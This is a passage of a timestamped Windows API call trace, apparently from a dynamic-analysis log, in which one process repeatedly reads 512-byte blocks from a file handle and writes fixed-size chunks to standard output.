lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.923] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.923] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] GetFileType (hFile=0x50) returned 0x1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] GetFileType (hFile=0x50) returned 0x1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] GetFileType (hFile=0x50) returned 0x1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] GetFileType (hFile=0x50) returned 0x1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] GetFileType (hFile=0x50) returned 0x1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, 
lpOverlapped=0x0) returned 1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] GetFileType (hFile=0x50) returned 0x1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] GetFileType (hFile=0x50) returned 0x1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] GetFileType (hFile=0x50) returned 0x1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.924] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.924] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.925] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.925] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] GetFileType (hFile=0x50) returned 0x1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] GetFileType (hFile=0x50) returned 0x1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] WriteFile (in: hFile=0x50, 
lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] GetFileType (hFile=0x50) returned 0x1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] GetFileType (hFile=0x50) returned 0x1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] GetFileType (hFile=0x50) returned 0x1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] GetFileType (hFile=0x50) returned 0x1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.926] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.926] GetFileType (hFile=0x50) returned 0x1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.926] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.926] GetFileType (hFile=0x50) returned 0x1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.926] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.926] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.926] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.926] GetFileType (hFile=0x50) returned 0x1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.926] GetFileType (hFile=0x50) returned 0x1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] GetFileType (hFile=0x50) returned 0x1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 
[0225.927] GetFileType (hFile=0x50) returned 0x1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] GetFileType (hFile=0x50) returned 0x1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] GetFileType (hFile=0x50) returned 0x1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] GetFileType (hFile=0x50) returned 0x1 [0225.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.927] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] GetFileType (hFile=0x50) returned 0x1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.928] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.928] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] GetFileType (hFile=0x50) returned 0x1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] GetFileType (hFile=0x50) returned 0x1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] GetFileType (hFile=0x50) returned 0x1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] GetFileType (hFile=0x50) returned 0x1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] GetFileType (hFile=0x50) returned 0x1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: 
lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] GetFileType (hFile=0x50) returned 0x1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] GetFileType (hFile=0x50) returned 0x1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] GetFileType (hFile=0x50) returned 0x1 [0225.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.929] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.929] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.929] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.930] GetFileType (hFile=0x50) returned 0x1 [0225.930] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: 
lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.930] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.930] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.930] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.930] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.930] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, 
lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.931] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.932] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.933] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, 
lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.934] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.935] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.935] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.935] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.935] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 